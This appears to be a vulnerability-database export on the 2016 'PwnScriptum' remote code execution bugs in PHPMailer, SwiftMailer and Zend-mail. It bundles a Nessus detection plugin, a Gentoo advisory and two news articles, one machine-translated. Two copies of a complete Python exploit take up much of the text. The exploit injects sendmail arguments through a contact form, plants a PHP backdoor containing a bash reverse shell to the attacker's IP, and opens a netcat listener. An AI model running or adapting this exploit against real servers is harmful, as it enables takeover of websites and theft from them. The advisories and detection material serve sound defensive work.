name', default=\"email\")\r\nparser.add_argument('--post-msg', dest='POST_MSG', required=False, help='Overrides POST \"message\" field name', default=\"msg\")\r\nargs = parser.parse_args()\r\n\r\n# Preset vars\r\nTMOUT = 3\r\n# Set Vars\r\nif args.ATTACKERS_PORT is None:\r\n\targs.ATTACKERS_PORT = 8080\r\nif args.TARGET_UP_DIR is None:\r\n\targs.TARGET_UP_DIR = \"upload\"\r\n# Build the target backdoor URL here (note the \"random\" pid bit to avoid php code collisions on multiple runs / multiple phpfile appends ;)\r\nBACKDOOR_FILE = 'phpbackdoor' + str(os.getpid()) + '.php'\r\nBACKDOOR_URL = args.WEBAPP_BASE_URL + '/' + args.TARGET_UP_DIR + '/' + BACKDOOR_FILE\r\nCONTACT_SCRIPT_URL = args.WEBAPP_BASE_URL + args.CONTACT_SCRIPT\r\n\r\n# Show params\r\nprint \"\"\"[+] Setting vars to: \\n\r\nWEBAPP_BASE_URL = [%s]\r\nCONTACT_SCRIPT = [%s]\r\nTARGET_UP_DIR = [%s]\r\nATTACKERS_IP = [%s]\r\nATTACKERS_PORT = [%s]\r\nCONTACT_SCRIPT_URL = [%s]\r\nBACKDOOR_FILEl = [%s]\r\n\"\"\" % (args.WEBAPP_BASE_URL, args.CONTACT_SCRIPT, args.TARGET_UP_DIR, args.ATTACKERS_IP, args.ATTACKERS_PORT, CONTACT_SCRIPT_URL, BACKDOOR_FILE)\r\n\r\n\r\nprint \"[+] Choose your target / payload: \"\r\nprint \"\\033[1;34m\"\r\nprint \"\"\"[1] PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)\\n\"\"\"\r\nprint \"\"\"[2] PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045)\r\n\t The escapeshellarg() bypass :)\\n\"\"\"\r\nprint \"\"\"[3] SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)\\n\"\"\"\r\nprint \"\"\"[4] Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)\\n\"\"\"\r\nprint \"\\033[0m\"\r\n\r\ntry:\r\n target = int(raw_input('[?] Select target [1-2]: '))\r\nexcept ValueError:\r\n print \"Not a valid choice. Exiting\\n\"\r\n exit(2)\r\nif (target>4):\r\n print \"No such target. Exiting\\n\"\r\n exit(3)\r\nif target == 1:\r\n\t# PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)\r\n\tpayload = '\"attacker\\\\\" -oQ/tmp/ -X%s/%s some\"@email.com' % (args.TARGET_UP_DIR, BACKDOOR_FILE)\r\nif target == 2:\r\n\t# Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)\r\n\tpayload = \"\\\"attacker\\\\' -oQ/tmp/ -X%s/%s some\\\"@email.com\" % (args.TARGET_UP_DIR, BACKDOOR_FILE)\r\nif target == 3:\r\n\t# SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)\r\n payload = '\"attacker\\\\\" -oQ/tmp/ -X%s/%s \"@email.com' % (args.TARGET_UP_DIR, BACKDOOR_FILE)\r\nif target == 4:\r\n\t# Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)\r\n payload = '\"attacker\\\\\" -oQ/tmp/ -X%s/%s \"@email.com' % (args.TARGET_UP_DIR, BACKDOOR_FILE)\r\n\r\nprint \"\\n[+] Generated mail() payload will upload the backdoor into the '%s' dir\\n\" % args.TARGET_UP_DIR\r\n# PHP RCE code to be saved into the backdoor php file on the target in TARGET_UP_DIR. E.g:\r\n# e.g: \r\n#RCE_PHP_CODE = \"<?php phpinfo(); ?>\" \r\nRCE_PHP_CODE = \"\"\"<?php sleep(%d); system(\"/bin/bash -c 'nohup bash -i >/dev/tcp/%s/%s 0<&1 2>&1' \"); ?>\"\"\" % (TMOUT, args.ATTACKERS_IP, args.ATTACKERS_PORT) \r\n\r\n# The form names might need to be adjusted\r\npost_fields = {'action': \"%s\" % args.POST_ACTION, \"%s\" % args.POST_NAME: 'Jas Fasola', \"%s\" % args.POST_EMAIL: payload, \"%s\" % args.POST_MSG: RCE_PHP_CODE}\r\n\r\n# Attack\r\n# Inject payload into PHPMailer / mail() via a Contact form. This should write out the backdoor\r\nprint \"[+] Backdoor upload via the contact form at '%s'\\n\" % CONTACT_SCRIPT_URL\r\ndata = urllib.urlencode(post_fields)\r\nreq = urllib2.Request(CONTACT_SCRIPT_URL, data)\r\nresponse = urllib2.urlopen(req)\r\nthe_page = response.read()\r\n\r\n\r\n# Check if the backdoor was uploaded correctly.\r\n# A little trick here. The urlopen should timeout at sleep(X)-1 if the backdoor ran fine\r\n# So we catch the timeout to find out.\r\n\r\n# Is it uploaded ? Try to execute the PHP backdoor and the Reverse Shell within it\r\nprint \"[+] Checking for the backdoor at the URL '%s'\\n\" % BACKDOOR_URL\r\ngot_timeout = 0\r\nhttp_err = 0\r\ntry:\r\n urllib2.urlopen(BACKDOOR_URL, timeout = (TMOUT-1))\r\nexcept urllib2.HTTPError as e:\r\n http_err = e.code\r\nexcept socket.timeout as e:\r\n print \"[*] \\033[1;32mLooking good!\\033[0m The sleep() worked by the looks of it :) \\nUrlopen timed out just in time for the shell :)\\n\"\r\n got_timeout = 1\r\n\r\nif (got_timeout != 1):\r\n print \"[!] Something went wrong... Got error: [%d] \\nTry another dir? Push through, don't give up! :)\\n\" % http_err\r\n exit(2)\r\n\r\n# Spawn the shell and wait for the sleep() PHP call to finish before /bin/bash is called\r\nprint \"[+] We should get a shell if we got till here! Spawning netcat now! :)\\n\"\r\nprint \"[+] \\033[1;34mPlease tell me you're seeing this too... ;)\\033[0m\\n\"\r\nos.system(\"nc -v -l -p %d\" % args.ATTACKERS_PORT)\r\n\r\nprint \"\\n[+] Shell closed\\n\"\r\n\r\nprint \"\\033[1;34mP.$. There's more to it :) Exiting, for now...\\033[0m\\n\"\r\n\r\n\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/40986/"}], "nessus": [{"lastseen": "2019-11-01T02:41:46", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201804-10\n(Zend Framework: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Zend Framework that\n have remain unaddressed. Please review the referenced CVE identifiers for\n details.\n \nImpact :\n\n Remote attackers could execute arbitrary commands or conduct SQL\n injection attacks.\n \nWorkaround :\n\n There is no known workaround at this time.", "modified": "2019-11-02T00:00:00", "id": "GENTOO_GLSA-201804-10.NASL", "href": "https://www.tenable.com/plugins/nessus/108931", "published": "2018-04-10T00:00:00", "title": "GLSA-201804-10 : Zend Framework: Multiple vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201804-10.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108931);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\"CVE-2016-10034\", \"CVE-2016-4861\", \"CVE-2016-6233\");\n script_xref(name:\"GLSA\", value:\"201804-10\");\n\n script_name(english:\"GLSA-201804-10 : Zend Framework: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201804-10\n(Zend Framework: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Zend Framework that\n have remain unaddressed. Please review the referenced CVE identifiers for\n details.\n \nImpact :\n\n Remote attackers could execute arbitrary commands or conduct SQL\n injection attacks.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201804-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Gentoo has discontinued support for Zend Framework and recommends that\n users unmerge the package:\n # emerge --unmerge 'dev-php/ZendFramework'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ZendFramework\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-php/ZendFramework\", unaffected:make_list(), vulnerable:make_list(\"le 1.12.9\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Zend Framework\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2018-04-09T19:08:30", "bulletinFamily": "unix", "description": "### Background\n\nZend Framework is a high quality and open source framework for developing Web Applications. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Zend Framework that have remain unaddressed. Please review the referenced CVE identifiers for details. \n\n### Impact\n\nRemote attackers could execute arbitrary commands or conduct SQL injection attacks. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nGentoo has discontinued support for Zend Framework and recommends that users unmerge the package: \n \n \n # emerge --unmerge \"dev-php/ZendFramework\"", "modified": "2018-04-09T00:00:00", "published": "2018-04-09T00:00:00", "href": "https://security.gentoo.org/glsa/201804-10", "id": "GLSA-201804-10", "type": "gentoo", "title": "Zend Framework: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "threatpost": [{"lastseen": "2018-10-06T22:54:17", "bulletinFamily": "info", "description": "Critical remote code execution vulnerabilities in two different libraries used to send emails via PHP were patched this week.\n\n[An issue in PHPMailer](<https://threatpost.com/phpmailer-bug-leaves-millions-of-websites-open-to-attack/122775/>), thought fixed, was resolved with an update, version 5.2.21, pushed late Wednesday. Developers with another mailing library for PHP, SwiftMailer, remedied a similar issue that could have also led to remote code execution on Thursday.\n\n> [#Swiftmailer](<https://twitter.com/hashtag/Swiftmailer?src=hash>) 5.4.5 fixes CVE-2016-10074. Thanks [@barryvdh](<https://twitter.com/barryvdh>) and [@Zenexer](<https://twitter.com/Zenexer>) for the help. And to [@dawid_golunski](<https://twitter.com/dawid_golunski>) for finding the issue\n> \n> \u2014 Fabien Potencier (@fabpot) [December 29, 2016](<https://twitter.com/fabpot/status/814416314429308928>)\n\nBoth bugs were disclosed this week by researcher [Dawid Golunski](<https://twitter.com/dawid_golunski>) of [Legal Hackers](<https://legalhackers.com/>).\n\nAn attacker could have exploited the PHPMailer vulnerability ([CVE-2016-10033](<https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html>)) by targeting website components that use PHPMailer, like contact/registration forms, password email reset forms, and so forth. In addition to giving a remote attacker the ability to execute arbitrary code, the vulnerability also could have given attackers access to a web server hosting a web app that used a vulnerable version of the library. To get the word out, a website for the vulnerability, nicknamed [PwnScriptum](<http://pwnscriptum.com/>), and a logo, began making the rounds earlier this week.\n\nIt was learned early Wednesday an update PHPMailer pushed to fix the original issue over the weekend, version 5.2.18, could be bypassed. That bypass was given a new CVE ([CVE-2016-10045](<https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html>)) something that put the original issue back at \u2018square one,\u2019 according to the researcher.\n\n\u201cThere is no public patch at the moment. All PHPMailer versions are vulnerable again. Back to square one,\u201d Golunski told Threatpost Wednesday.\n\n> [ [#RCE](<https://twitter.com/hashtag/RCE?src=hash>) [#0day](<https://twitter.com/hashtag/0day?src=hash>) [#vuln](<https://twitter.com/hashtag/vuln?src=hash>)] SwiftMailer Remains Unpatched.Adding to the [#PwnScriptum](<https://twitter.com/hashtag/PwnScriptum?src=hash>) [#phpmailer](<https://twitter.com/hashtag/phpmailer?src=hash>) family \ud83d\ude09 <https://t.co/bg8ByA6eSr> [#infosec](<https://twitter.com/hashtag/infosec?src=hash>) [#security](<https://twitter.com/hashtag/security?src=hash>)\n> \n> \u2014 Dawid Golunski (@dawid_golunski) [December 28, 2016](<https://twitter.com/dawid_golunski/status/814176750662021120>)\n\n[PHPMailer](<https://github.com/PHPMailer/PHPMailer>) eventually fixed the bypass issue with an update, version 5.2.20, later that day.\n\nThe [SwiftMailer](<https://github.com/swiftmailer/swiftmailer>) vulnerability ([CVE-2016-10074](<https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html>)) could have been exploited through the same means as the PHPMailer vulnerability: contact/registration forms, password email reset forms, and any other components that use the SwiftMailer class. Before a fix was applied, the vulnerability affected all versions of the library, including the then-current release, 5.4.5-DEV.\n\nCiting weeks of inactivity by the vendor, Golunski disclosed the vulnerability on Wednesday. Once disclosed, SwiftMailer acted fast to fix the vulnerability, pushing version 5.4.5 on Thursday.\n\nAccording to the changelog for [SwiftMailer](<https://github.com/swiftmailer/swiftmailer/blob/5.x/CHANGES>) on GitHub, developers fixed the issue by deprecating the mail transport used by the library, Swift_Transport_MailTransport, as it was vulnerable to passing arbitrary shell arguments.\n\nGolunski published a similar [proof of concept exploit](<https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034-Vuln.html>) for another PHP framework, Zend Framework, on December 30. Zend, the company responsible for the framework, [patched the vulnerability](<https://framework.zend.com/security/advisory/ZF2016-04>) in zend-mail, starting in version 2.7.2, zend-mail, 2.4.11, and Zend Framework, 2.4.11, on December 20. Golunski claims he will publish a more robust disclosure, in which he will discuss other vectors and exploits, in a future whitepaper.\n\nGolunski has had a busy end to 2016. In addition to the PHPMailer and SwiftMailer vulnerabilities, he uncovered two critical vulnerabilities in the open source IT infrastructure monitoring software Nagios Core [earlier this month](<https://threatpost.com/nagios-core-patches-root-rce-vulnerabilities/122558/>). If exploited those vulnerabilities could have been used to elevate privileges to root and gain remote code execution.\n\n_This article was updated on January 3 to include information regarding a similar vulnerability in Zend Framework._\n", "modified": "2017-01-06T15:20:39", "published": "2016-12-29T14:20:38", "id": "THREATPOST:6FB38D322999A6FDD13C28B8C35B0C8F", "href": "https://threatpost.com/phpmailer-swiftmailer-updates-resolve-critical-remote-code-execution-vulnerabilities/122795/", "type": "threatpost", "title": "PHPMailer, SwiftMailer Updates Resolve Critical Remote Code Execution Vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2017-01-04T02:03:27", "bulletinFamily": "exploit", "description": "", "modified": "2017-01-03T00:00:00", "published": "2017-01-03T00:00:00", "href": "https://packetstormsecurity.com/files/140349/PHPMailer-Zend-mail-SwiftMailer-Remote-Code-Execution.html", "id": "PACKETSTORM:140349", "type": "packetstorm", "title": "PHPMailer / Zend-mail / SwiftMailer Remote Code Execution", "sourceData": "`#!/usr/bin/python \n \nintro = \"\"\"\\033[94m \n__ __ __ __ __ \n/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________ \n/ / / _ \\/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \\/ ___/ ___/ \n/ /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ ) \n/_____/\\___/\\__, /\\__,_/_/ /_/ /_/\\__,_/\\___/_/|_|\\___/_/ /____/ \n/____/ \n \n \nPHPMailer / Zend-mail / SwiftMailer - Remote Code Execution Exploit \na.k.a \"PwnScriptum\" \n \nCVE-2016-10033 + CVE-2016-10045 + CVE-2016-10034 + CVE-2016-10074 \n \n \nThis PoC exploit aims to execute a reverse shell on the target in \nthe context of the web-server user via vulnerable PHP email library. \n \n \nDiscovered and Coded by: \n \n\\033[1;34m \nDawid Golunski \nhttps://legalhackers.com \n \nt: @dawid_golunski for updates \n\\033[0m \n\\033[94m \nP.$. For testing only! Don't break the Web ;) \n\\033[0m \n\"\"\" \ninfo = \"\"\" \n[Version] \nLimited (ver. 1.0) \n \n[PoC Video] \nSee the the exploit in action at: \n \nhttps://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html \n \n[Info] \nThis exploit targets a common webapp component - Contact Form. \n \nIt combines payloads for the following vulns: \n \n1. PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033) \nhttps://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html \n \n2. PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045 / escapeshell bypass) \nhttps://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln.html \n \n3. SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074) \nhttps://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html \n \n4. Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034) \nhttps://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034-Vuln.html \n \n[Usage] \n \n./PwnScriptum_RCE_exploit.py [-h] -url WEBAPP_BASE_URL -cf CONTACT_SCRIPT \n[-d TARGET_UP_DIR] -ip ATTACKERS_IP \n[-p ATTACKERS_PORT] [--version] \n[--post-action POST_ACTION] \n[--post-name POST_NAME] \n[--post-email POST_EMAIL] \n[--post-msg POST_MSG] \n \nNote, make sure the contact form matches the default field names (send/name/email/msg). \nOtherwise override with --post-msg=message_box for example. \n \n\"\"\" \n \nimport os \nimport argparse \nimport time \nimport urllib \nimport urllib2 \nimport socket \nimport sys \n \n \n# The Main Meat \nprint intro \n \n# Show info \nif '-H' in sys.argv: \nprint info \nexit(0) \n# Parse input args \nparser = argparse.ArgumentParser(prog='PwnScriptum_RCE_exploit.py', description='PHPMailer / Zend-mail / SwiftMailer - RCE Exploit (a.k.a \\'PwnScriptum\\')\\nDiscovered by Dawid Golunski (https://legalhackers.com)') \nparser.add_argument('-H', action='store_true', default=\"false\", required=False, help='Full Help / Info Page') \nparser.add_argument('-url', dest='WEBAPP_BASE_URL', required=True, help='WebApp Base Url') \nparser.add_argument('-cf', dest='CONTACT_SCRIPT', required=True, help='Contact Form scriptname') \nparser.add_argument('-d' , dest='TARGET_UP_DIR', required=False, help='Target Upload Dir') \nparser.add_argument('-ip', dest='ATTACKERS_IP', required=True, help='Attackers Public IP for RevShell') \nparser.add_argument('-p', dest='ATTACKERS_PORT', required=False, help='Attackers Port for RevShell listener') \nparser.add_argument('--version', action='version', version='%(prog)s 1.0 Limited edition') \nparser.add_argument('--post-action', dest='POST_ACTION', required=False, help='Overrides POST \"action\" field name', default=\"send\") \nparser.add_argument('--post-name', dest='POST_NAME', required=False, help='Overrides POST \"name of sender\" field name', default=\"name\") \nparser.add_argument('--post-email', dest='POST_EMAIL', required=False, help='Overrides POST \"email\" field name', default=\"email\") \nparser.add_argument('--post-msg', dest='POST_MSG', required=False, help='Overrides POST \"message\" field name', default=\"msg\") \nargs = parser.parse_args() \n \n# Preset vars \nTMOUT = 3 \n# Set Vars \nif args.ATTACKERS_PORT is None: \nargs.ATTACKERS_PORT = 8080 \nif args.TARGET_UP_DIR is None: \nargs.TARGET_UP_DIR = \"upload\" \n# Build the target backdoor URL here (note the \"random\" pid bit to avoid php code collisions on multiple runs / multiple phpfile appends ;) \nBACKDOOR_FILE = 'phpbackdoor' + str(os.getpid()) + '.php' \nBACKDOOR_URL = args.WEBAPP_BASE_URL + '/' + args.TARGET_UP_DIR + '/' + BACKDOOR_FILE \nCONTACT_SCRIPT_URL = args.WEBAPP_BASE_URL + args.CONTACT_SCRIPT \n \n# Show params \nprint \"\"\"[+] Setting vars to: \\n \nWEBAPP_BASE_URL = [%s] \nCONTACT_SCRIPT = [%s] \nTARGET_UP_DIR = [%s] \nATTACKERS_IP = [%s] \nATTACKERS_PORT = [%s] \nCONTACT_SCRIPT_URL = [%s] \nBACKDOOR_FILEl = [%s] \n\"\"\" % (args.WEBAPP_BASE_URL, args.CONTACT_SCRIPT, args.TARGET_UP_DIR, args.ATTACKERS_IP, args.ATTACKERS_PORT, CONTACT_SCRIPT_URL, BACKDOOR_FILE) \n \n \nprint \"[+] Choose your target / payload: \" \nprint \"\\033[1;34m\" \nprint \"\"\"[1] PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)\\n\"\"\" \nprint \"\"\"[2] PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045) \nThe escapeshellarg() bypass :)\\n\"\"\" \nprint \"\"\"[3] SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)\\n\"\"\" \nprint \"\"\"[4] Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)\\n\"\"\" \nprint \"\\033[0m\" \n \ntry: \ntarget = int(raw_input('[?] Select target [1-2]: ')) \nexcept ValueError: \nprint \"Not a valid choice. Exiting\\n\" \nexit(2) \nif (target>4): \nprint \"No such target. Exiting\\n\" \nexit(3) \nif target == 1: \n# PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033) \npayload = '\"attacker\\\\\" -oQ/tmp/ -X%s/%s some\"@email.com' % (args.TARGET_UP_DIR, BACKDOOR_FILE) \nif target == 2: \n# Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045) \npayload = \"\\\"attacker\\\\' -oQ/tmp/ -X%s/%s some\\\"@email.com\" % (args.TARGET_UP_DIR, BACKDOOR_FILE) \nif target == 3: \n# SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074) \npayload = '\"attacker\\\\\" -oQ/tmp/ -X%s/%s \"@email.com' % (args.TARGET_UP_DIR, BACKDOOR_FILE) \nif target == 4: \n# Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034) \npayload = '\"attacker\\\\\" -oQ/tmp/ -X%s/%s \"@email.com' % (args.TARGET_UP_DIR, BACKDOOR_FILE) \n \nprint \"\\n[+] Generated mail() payload will upload the backdoor into the '%s' dir\\n\" % args.TARGET_UP_DIR \n# PHP RCE code to be saved into the backdoor php file on the target in TARGET_UP_DIR. E.g: \n# e.g: \n#RCE_PHP_CODE = \"<?php phpinfo(); ?>\" \nRCE_PHP_CODE = \"\"\"<?php sleep(%d); system(\"/bin/bash -c 'nohup bash -i >/dev/tcp/%s/%s 0<&1 2>&1' \"); ?>\"\"\" % (TMOUT, args.ATTACKERS_IP, args.ATTACKERS_PORT) \n \n# The form names might need to be adjusted \npost_fields = {'action': \"%s\" % args.POST_ACTION, \"%s\" % args.POST_NAME: 'Jas Fasola', \"%s\" % args.POST_EMAIL: payload, \"%s\" % args.POST_MSG: RCE_PHP_CODE} \n \n# Attack \n# Inject payload into PHPMailer / mail() via a Contact form. This should write out the backdoor \nprint \"[+] Backdoor upload via the contact form at '%s'\\n\" % CONTACT_SCRIPT_URL \ndata = urllib.urlencode(post_fields) \nreq = urllib2.Request(CONTACT_SCRIPT_URL, data) \nresponse = urllib2.urlopen(req) \nthe_page = response.read() \n \n \n# Check if the backdoor was uploaded correctly. \n# A little trick here. The urlopen should timeout at sleep(X)-1 if the backdoor ran fine \n# So we catch the timeout to find out. \n \n# Is it uploaded ? Try to execute the PHP backdoor and the Reverse Shell within it \nprint \"[+] Checking for the backdoor at the URL '%s'\\n\" % BACKDOOR_URL \ngot_timeout = 0 \nhttp_err = 0 \ntry: \nurllib2.urlopen(BACKDOOR_URL, timeout = (TMOUT-1)) \nexcept urllib2.HTTPError as e: \nhttp_err = e.code \nexcept socket.timeout as e: \nprint \"[*] \\033[1;32mLooking good!\\033[0m The sleep() worked by the looks of it :) \\nUrlopen timed out just in time for the shell :)\\n\" \ngot_timeout = 1 \n \nif (got_timeout != 1): \nprint \"[!] Something went wrong... Got error: [%d] \\nTry another dir? Push through, don't give up! :)\\n\" % http_err \nexit(2) \n \n# Spawn the shell and wait for the sleep() PHP call to finish before /bin/bash is called \nprint \"[+] We should get a shell if we got till here! Spawning netcat now! :)\\n\" \nprint \"[+] \\033[1;34mPlease tell me you're seeing this too... ;)\\033[0m\\n\" \nos.system(\"nc -v -l -p %d\" % args.ATTACKERS_PORT) \n \nprint \"\\n[+] Shell closed\\n\" \n \nprint \"\\033[1;34mP.$. There's more to it :) Exiting, for now...\\033[0m\\n\" \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/140349/pwnscriptum-exec.txt"}], "myhack58": [{"lastseen": "2017-01-05T15:01:01", "bulletinFamily": "info", "description": "! [](/Article/UploadPic/2017-1/20171543510834. png? www. myhack58. com) \nResearchers recently found a present in 3 common open source PHP Library for high-risk(Critical)vulnerabilities, hackers can exploit this vulnerability to remotely execute arbitrary commands, there is a vulnerability in the PHP library includes SwiftMailer And PhpMailer and ZendMail it. \nA few days ago FreeBuf reported from Poland Legal Hackers, a researcher Dawid Golunski before a burst will disclose the presence in the PHPMailer Vulnerability(CVE-2016-10033), the exploit program on the parameters of the filtering is imperfect, to execute arbitrary code. PHPMailer in the world with users is about 900 million. So, PHPMailer for that vulnerability was released 5. 2. 18 edition, which uses the escapeshellarg()function to filter, seems to fix the vulnerability, but in fact a new function with the escapeshellcmd()there is a conflict. \nThe use of the new version of the conflict, the researchers Golunski again bypassing the 5. 2. 18 version of PHPMailer in security measures, and therefore the application of a new vulnerability ID(CVE-2016-10045)\u3002 This is a vulnerability affecting a wider range, including many open source web applications such as WordPress, Drupal, 1CRM, SugarCRM, Yii and Joomla are could be subject to attack. \nIn the end, PHPMailer released 5. 2. 20 version, all previous versions are affected, please webmasters as soon as possible to upgrade to the latest version. \nIn addition, Golunski also found two other PHP libraries in similar vulnerability, which two PHP library is SwiftMailer and ZendMail it. The above three vulnerability risk level to reach the high-risk(Critical) to. \nSwiftMailer remote command execution vulnerability, CVE-2016-10074\uff09 \nSwiftMailer is also a section with many users of the software, it can be through the SMTP Protocol to send mail. Many open source projects use this library, including Yii2, Laravel,Symfony is. \nSwiftMailer vulnerability using the method of the PHPMailer vulnerability similar, just find the use of the SwiftMailer page, such as registration, contact forms, password resets, etc. the page will be able to execute the command. \nHackers can be in the[web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)on the remote execution command, so that the storming of the server. \nSwiftMailer all versions affected by this vulnerability, including the most recent 5. 4. 5-DEV version. \nGolunski to the SwiftMailer team reported this vulnerability, the development team quickly fixed the vulnerability within a day released a 5. 4. 5 Edition. \nThe \u201cmail transmission function(Swift_Transport_MailTransport)vulnerability exists, if the\u201dFrom\u201dAnd\u201dReturnPath\u201dor\u201dSender\u201dheader from an untrusted source, the function may be transmitted to any of the shell parameters, which leads to remote code execution.\u201d SwiftMailer updates log writes. \nZendMail RCE Vulnerability CVE-2016-10034\uff09 \nZendMail is Zend Framework a PHP component Zend Framework has 9500 million installed capacity. \n! [](/Article/UploadPic/2017-1/20171543510857. png? www. myhack58. com) \n\nZendMail using the method with PHPMailer And SwiftMailer similar, on the address insert quotation marks. Because the program is not successful the filter, causing the input value is treated as a parameter to execute. \nGolunski has released a PoC video demo and a named PwnScriptum the triple exp, which contains three vulnerabilities attack method. And will soon publish a white paper to explain in detail the three vulnerabilities. \n\n", "modified": "2017-01-05T00:00:00", "published": "2017-01-05T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/82688.htm", "id": "MYHACK58:62201782688", "type": "myhack58", "title": "PhpMailer and SwiftMailer, the ZendMail successive exposure of the RCE high-risk vulnerabilities, affecting millions of Web servers-vulnerability warning-the black bar safety 